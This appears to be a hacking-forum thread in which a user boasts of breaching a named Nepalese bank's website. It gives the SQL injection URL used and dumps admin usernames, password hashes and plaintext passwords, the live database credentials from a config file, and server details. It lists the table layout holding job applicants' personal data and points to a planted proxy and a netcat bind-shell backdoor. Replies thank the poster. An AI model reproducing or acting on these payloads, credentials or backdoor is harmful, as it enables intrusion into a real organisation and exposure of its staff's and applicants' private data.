FULL ACCESS nccbank.com.np

[bl4ck]

FULL ACCESS nccbank.com.np

http://www.nccbank.com.np/displaynotice.php?idnotices=1+AND+1=2+UNION+SELECT+1,2--

Start exploiting...

http://www.nccbank.com.np/displaynotice.php?idnotices=1+AND+1=2+UNION+SELECT+1,[bl4ck]--

http://www.nccbank.com.np/admin/

Login: hrddept
Password: dept123

uname -a: Linux server.net-ns.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sysctl: Linux 2.6.18-128.1.10.el5
$OSTYPE: linux-gnu
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2
id: uid=99(nobody) gid=99(nobody) groups=99(nobody)
pwd: /home/nccbank/public_html/downloadfile

Database: nccbank_ncc
User: nccbank_admin@localhost
Version: 5.0.81-community

[1]login: id,name,password,type_id,fullname

1:URESHadmin:83b7b87b1c36724d60760403eecde40a:4:Uresh:
2:samrat:91614fb63fdc19e1fc84948f37962424:2:Samrat Dahal:
2:samrat:samrat:2:Samrat Dahal:
3:marketing:81dc2d59641012def5767ebb19af1fa5:1:Marketing Department:
4:marketing:81dc2d59641012def5767ebb19af1fa5:2:Marketing Department:
5:softncc:7bf80211d4b897c7ac08948032ecdfe5:4:soft:
6:hrd:40c4038633e70ed9dd6800390fa40fd8:4:Human Resource:
7:hrddept:60f2716d5ae7cddf7e2c590a241107b2:4:Human Resource Dept:
7:hrddept:dept123:4:Human Resource Dept:

[2]tbl_auction: id,auction_title,from_date,to_date,filename,status,level
[3]tbl_currency: id,currency,unit,level
[4]tbl_forex: id,curr_id,cynotes_buying,otherins_buying,otherins_selling,sales_selling,sales_buying,_date
[5]tbl_news: id,news_head,news_body,level,news_status
[6]tbl_notice: id,notice_title,notice_body,status
[7]tbl_pdf: id,title,filename,_date,menu,enabled,level
[8]tbl_vacancy: v_id,name,permanent_add,contact_add,txtCNo,txtPIssue,txtDIssue,family,spouse_name,father_name,telephone,mobile,email,qualification,university,passed_year,division,cgpa,percent,chkothers,computer_skill,chkbanking,pos_held,pos_held2,pos_held3,pos_held4,prev_employer,prev_employer2,prev_employer3,prev_employer4,years_emp,years_emp2,years_emp3,years_emp4,experience,experience2,experience3,experience4,subject,subject2,subject3,subject4,duration,duration2,duration3,duration4,conducted_by,conducted_by2,conducted_by3,conducted_by4,speaking_np,spe
aking_en,listening_np,listening_en,writing_np,writing_en,writing_oth,speaking_oth,listening_oth,im,fname,fdate,sp_qualification,extra_act,extra_act2,reason,dob_np,dob_en,job_for,txtname1,txtname2,txtaddress1,txtaddress2,txtcontact1,txtcontact2,date
[9]tbl_xl: id,title,filename,_date,level,fileIn
[10]user_type: id

nccbank:x:33652:33652::/home/nccbank:/usr/local/cpanel/bin/noshell

You can upload shell if you want

 

[AZOZ]

Thanks, but if put in place the SQL

Regards​

 

[bl4ck]

anyway...

nccbank_admin','knabcnk123','nccbank_ncc','localhost

<?php
// Include ezSQL core
include_once "shared/ez_sql_core.php";

// Include ezSQL database specific component
include_once "ez_sql_mysql.php";

// Initialise database object and establish a connection
// at the same time - db_user / db_password / db_name / db_host
$db = new ezSQL_mysql('nccbank_admin','knabcnk123','nccbank_ncc','localhost');


?>


I like this bank he give me proxy

http://www.nccbank.com.np/downloadfile/proxy.php

and


:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::

nc 216.45.57.231 5225

 

[AZOZ]

Is not expected to enter Bass changed by someone

....Looking forward to more​

 

[Dr.Alaa]

thanks black

 

[zaky092]

بارك الله فيك